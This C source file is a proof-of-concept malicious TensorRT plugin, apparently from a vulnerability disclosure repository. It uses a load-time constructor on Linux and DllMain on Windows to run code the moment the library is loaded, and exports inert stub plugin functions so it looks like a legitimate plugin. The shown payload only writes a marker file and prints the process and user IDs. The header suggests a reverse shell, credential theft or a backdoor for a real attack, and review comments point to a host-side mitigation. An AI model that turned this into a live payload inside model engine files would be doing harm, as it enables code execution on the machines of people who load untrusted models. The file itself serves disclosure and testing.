tensorrt-engine-rce-poc / malicious_plugin.c
/*
* Malicious TensorRT Plugin - Proof of Concept
*
* This shared library executes arbitrary code when loaded.
* - Linux: __attribute__((constructor)) runs on dlopen()
* - Windows: DllMain with DLL_PROCESS_ATTACH runs on LoadLibrary()
*
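* Both run inside the loader call itself, BEFORE it returns to the host and
* before any TensorRT API interaction with the plugin (setLoggerFinder /
* getCreators), so inspecting the plugin's exports after loading comes too late.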
*
* For PoC: creates a proof file and prints to stderr.
* In a real attack: reverse shell, credential theft, backdoor, etc.
*/
#include <stdio.h>
#include <stdlib.h>
#ifdef _WIN32
#include <windows.h>
#include <process.h>
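/**
 * DLL entry point for the Windows build of the PoC.
 *
 * On DLL_PROCESS_ATTACH it writes a marker file (first to C:\temp, then to
 * the current directory if that fails) and prints a banner with the process
 * id to stderr. Every other notification reason is ignored.
 *
 * The marker is the only evidence a tester gets, so the banner reports the
 * path that was actually written and says so when no file could be written.
 *
 * NOTE(review): Microsoft's guidance is to keep DllMain minimal because it
 * runs under the loader lock; the stdio calls here are tolerable for a
 * lab PoC but should not be copied into production code.
 * NOTE(review): mitigation belongs on the host side. TensorRT exposes
 * IRuntime::setEngineHostCodeAllowed() to govern engines that carry host
 * code; whether the load path this PoC targets honours it is not shown on
 * this page, so treat engine files of unknown origin as executable code.
 *
 * @param hModule            unused
 * @param ul_reason_for_call notification reason supplied by the loader
 * @param lpReserved         unused
 * @return always TRUE
 */
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    (void)hModule;
    (void)lpReserved;

    if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
        const char *proof_path = "C:\\temp\\tensorrt_rce_poc.txt";
        const int pid = _getpid();
        int written = 0;

        /* PoC: Write proof of execution, falling back to the working directory */
        FILE *f = fopen(proof_path, "w");
        if (!f) {
            proof_path = "tensorrt_rce_poc.txt";
            f = fopen(proof_path, "w");
        }
        if (f) {
            int ok = fprintf(f, "TensorRT Engine RCE PoC - Code executed via embedded plugin LoadLibrary()\n") >= 0;
            ok = (fprintf(f, "PID: %d\n", pid) >= 0) && ok;
            /* fclose() flushes; a failure here means the marker may be incomplete */
            ok = (fclose(f) == 0) && ok;
            written = ok;
        }

        fprintf(stderr, "\n[!] TensorRT RCE PoC: Arbitrary code executed via embedded plugin!\n");
        if (written) {
            fprintf(stderr, "[!] Proof written to %s\n", proof_path);
        } else {
            fprintf(stderr, "[!] Proof file could not be written\n");
        }
        fprintf(stderr, "[!] PID: %d\n\n", pid);
    }
    return TRUE;
}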
/*
 * TensorRT plugin stubs (Windows exports).
 *
 * Both are inert: the library registers no plugin creators, so everything
 * it does happens in DllMain at load time.
 * NOTE(review): presumably these are the symbols the TensorRT plugin loader
 * looks up - confirm against the TensorRT version under test.
 */

/* Accepts the logger finder and discards it. */
__declspec(dllexport) void setLoggerFinder(void *finder)
{
    (void)finder;
}

/* Reports zero creators through *n (when n is non-NULL) and returns NULL. */
__declspec(dllexport) void *getCreators(int *n)
{
    if (n != NULL) {
        *n = 0;
    }
    return NULL;
}
#else
#include <unistd.h>
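/**
 * Load-time constructor for the non-Windows build of the PoC.
 *
 * Marked __attribute__((constructor)), so it runs while the library is being
 * loaded rather than when the host calls an exported function. It writes a
 * marker file with the process and user ids, then prints a banner to stderr.
 *
 * The marker is the only evidence a tester gets, so the banner reports
 * success only when the file was actually written and closed cleanly.
 *
 * NOTE(review): the marker path is fixed and lives in a world-writable
 * directory, and fopen(..., "w") follows symlinks; run this only in a
 * disposable lab account or container, never as a privileged user on a
 * shared host.
 * NOTE(review): mitigation belongs on the host side. TensorRT exposes
 * IRuntime::setEngineHostCodeAllowed() to govern engines that carry host
 * code; whether the load path this PoC targets honours it is not shown on
 * this page, so treat engine files of unknown origin as executable code.
 */
__attribute__((constructor))
void malicious_init(void) {
    static const char proof_path[] = "/tmp/tensorrt_rce_poc";
    /* pid_t and uid_t have no portable printf conversion; widen explicitly */
    const long pid = (long)getpid();
    const unsigned long uid = (unsigned long)getuid();
    int written = 0;

    FILE *f = fopen(proof_path, "w");
    if (f) {
        int ok = fprintf(f, "TensorRT Engine RCE PoC - Code executed via embedded plugin dlopen()\n") >= 0;
        ok = (fprintf(f, "PID: %ld\nUID: %lu\n", pid, uid) >= 0) && ok;
        /* fclose() flushes; a failure here means the marker may be incomplete */
        ok = (fclose(f) == 0) && ok;
        written = ok;
    }

    fprintf(stderr, "\n[!] TensorRT RCE PoC: Arbitrary code executed via embedded plugin!\n");
    if (written) {
        fprintf(stderr, "[!] Proof written to %s\n", proof_path);
    } else {
        fprintf(stderr, "[!] Proof file %s could not be written\n", proof_path);
    }
    fprintf(stderr, "[!] PID: %ld, UID: %lu\n\n", pid, uid);
}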
/*
 * TensorRT plugin stubs.
 *
 * Both are inert: the library registers no plugin creators, so everything
 * it does happens in the load-time constructor.
 * NOTE(review): presumably these are the symbols the TensorRT plugin loader
 * looks up - confirm against the TensorRT version under test.
 */

/* Accepts the logger finder and discards it. */
void setLoggerFinder(void *finder)
{
    (void)finder;
}

/* Reports zero creators through *n (when n is non-NULL) and returns NULL. */
void *getCreators(int *n)
{
    if (n != NULL) {
        *n = 0;
    }
    return NULL;
}
#endif